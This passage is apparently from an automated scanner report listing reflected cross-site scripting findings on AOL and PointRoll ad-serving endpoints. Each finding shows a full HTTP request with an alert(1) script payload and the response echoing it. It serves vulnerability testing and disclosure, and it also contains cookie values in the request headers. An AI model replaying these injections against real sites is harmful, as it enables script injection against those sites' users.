caday1=JN3XVNCsI8t((!!; cafb=L^JHM$5A(F^aB',#T`mD$o6r8

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 14:10:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 21 Nov 2010 14:10:13 GMT
Pragma: no-cache
Content-Length: 4349
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&anmember=316&anprice=30&c9071"-alert(1)-"47372ef7d14=1&s=1532283&_salt=2975334667";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

2.62. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a29f1<script>alert(1)</script>8031e56c6a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/mediaa29f1<script>alert(1)</script>8031e56c6a9/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Fri, 19 Nov 2010 23:39:53 GMT

{"isOk":false,"callDuration":1,"result":{"className":"java.lang.IllegalArgumentException","message":"[/mediaa29f1<script>alert(1)</script>8031e56c6a9/getVideo] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.glo
...[SNIP]...

2.63. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 13383<script>alert(1)</script>759d055aeaf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo13383<script>alert(1)</script>759d055aeaf?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Fri, 19 Nov 2010 23:39:55 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media/getVideo13383<script>alert(1)</script>759d055aeaf] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.global.util.
...[SNIP]...

2.64. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the brightcoveId request parameter is copied into the HTML document as plain text between tags. The payload 60e4e<script>alert(1)</script>b30e3448c3 was submitted in the brightcoveId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request


GET /adam-services/api/media/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId=60e4e<script>alert(1)</script>b30e3448c3 HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Date: Fri, 19 Nov 2010 23:39:34 GMT
Content-Length: 11064

{"isOk":false,"callDuration":1,"result":{"className":"java.lang.IllegalArgumentException","message":"Cannot convert [brightcoveId] parameter with values of [60e4e<script>alert(1)</script>b30e3448c3] to [long] type!","stackTrace":[{"className":"com.aol.global.util.WebPageContext","methodName":"getParameter","fileName":"WebPageContext.java","lineNumber":330},{"className":"com.aol.global.util.WebPa
...[SNIP]...

2.65. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 60918<script>alert(1)</script>c05f1131b8b was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo?version=1.060918<script>alert(1)</script>c05f1131b8b&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4710
Date: Fri, 19 Nov 2010 23:39:12 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[1.060918<script>alert(1)</script>c05f1131b8b] is not a valid version string!","stackTrace":[{"className":"com.aol.global.util.Version","methodName":"<init>
...[SNIP]...

2.66. http://ads.pointroll.com/PortalServe/ [dom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1061d"%3balert(1)//0b9bf39d227 was submitted in the dom parameter. This input was echoed as 1061d";alert(1)//0b9bf39d227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com1061d"%3balert(1)//0b9bf39d227&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
lw%252FA%253D5758430%252FR%253D0%252F%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com1061d";alert(1)//0b9bf39d227&time=5|16:53|-6&r=0.8183337452065122&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.67. http://ads.pointroll.com/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81d17"%3balert(1)//822354244e3 was submitted in the flash parameter. This input was echoed as 81d17";alert(1)//822354244e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=1081d17"%3balert(1)//822354244e3&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
4,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com&time=5|16:53|-6&r=0.8183337452065122&flash=1081d17";alert(1)//822354244e3&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.68. http://ads.pointroll.com/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a84d"%3balert(1)//df37bfae83c was submitted in the r parameter. This input was echoed as 8a84d";alert(1)//df37bfae83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com&r=0.81833374520651228a84d"%3balert(1)//df37bfae83c HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com&time=5|16:53|-6&r=0.81833374520651228a84d";alert(1)//df37bfae83c&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.69. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30e5d"-alert(1)-"997de5d3b84 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$30e5d"-alert(1)-"997de5d3b84&pos=x&dom=http://ad.yieldmanager.com&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$30e5d"-alert(1)-"997de5d3b84&dom=http://ad.yieldmanager.com&time=5|16:53|-6&r=0.8183337452065122&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.70. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca09"%3balert(1)//ea2b3e7c2b5 was submitted in the time parameter. This input was echoed as dca09";alert(1)//ea2b3e7c2b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

